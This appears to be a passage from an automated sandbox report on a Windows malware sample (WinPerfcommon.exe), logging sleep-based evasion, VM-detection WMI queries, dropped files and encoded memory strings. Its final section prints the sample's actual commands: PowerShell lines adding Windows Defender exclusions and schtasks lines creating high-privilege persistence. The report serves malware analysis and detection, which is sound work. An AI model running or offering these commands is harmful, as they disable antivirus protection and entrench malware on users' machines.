                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\SgrmBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\SgrmBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\SystemSettings.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\SystemSettings.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3847Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3156Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3630
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3343
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3872
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3439
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeDropped PE file which has not been started: C:\Users\user\Desktop\yHNOGCAC.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\PipMsYLy.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeDropped PE file which has not been started: C:\Users\user\Desktop\GKMojBlr.logJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeDropped PE file which has not been started: C:\Users\user\Desktop\iFHJmzLo.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZQJbcBRg.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\zsLwvutf.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\GEhWIfwR.logJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeDropped PE file which has not been started: C:\Users\user\Desktop\fyKARhRs.logJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeDropped PE file which has not been started: C:\Users\user\Desktop\EAqnjiFq.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\izcrMdWN.logJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZWotDWGG.logJump to dropped file
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeDropped PE file which has not been started: C:\Users\user\Desktop\PoUdTuAY.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\YLyBcRbf.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\zGtWfQBc.logJump to dropped file
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe TID: 6736Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364Thread sleep count: 3847 > 30Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7164Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe TID: 7412Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7280Thread sleep count: 3156 > 30Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep count: 3630 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep time: -2767011611056431s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep count: 3343 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7468Thread sleep count: 3872 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep count: 3439 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe TID: 6992Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\SgrmBroker.exe TID: 7520Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\SgrmBroker.exe TID: 8060Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe TID: 8076Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe TID: 2944Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\SystemSettings.exe TID: 7608Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\SystemSettings.exe TID: 7588Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe TID: 8144Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\WinPerfcommon.exe TID: 7112Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe TID: 7616Thread sleep time: -30000s >= -30000s
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe TID: 8024Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe TID: 5804Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\SgrmBroker.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\SgrmBroker.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\SystemSettings.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\SystemSettings.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\SgrmBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\SgrmBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\SystemSettings.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\SystemSettings.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1849068731.0000000013271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                              Source: WinPerfcommon.exe, 00000000.00000002.1745526741.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                              Source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1849068731.00000000131BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                              Source: WinPerfcommon.exe, 00000000.00000002.1803559438.000000001BC59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\a
                              Source: w32tm.exe, 0000002E.00000002.1802501531.000002357C197000.00000004.00000020.00020000.00000000.sdmp, pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1850754323.000000001B9C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess token adjusted: Debug
                              Source: C:\Recovery\SgrmBroker.exeProcess token adjusted: Debug
                              Source: C:\Recovery\SgrmBroker.exeProcess token adjusted: Debug
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeProcess token adjusted: Debug
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeProcess token adjusted: Debug
                              Source: C:\Recovery\SystemSettings.exeProcess token adjusted: Debug
                              Source: C:\Recovery\SystemSettings.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess token adjusted: Debug
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Adds a directory exclusion to Windows Defender
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe'
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe'
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SgrmBroker.exe'
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WinPerfcommon.exe'
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SgrmBroker.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbN" /sc ONLOGON /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /fJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 9 /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /fJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SgrmBroker.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 13 /tr "'C:\Recovery\SgrmBroker.exe'" /rl HIGHEST /fJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BUc8lPV5KF.bat" Jump to behavior
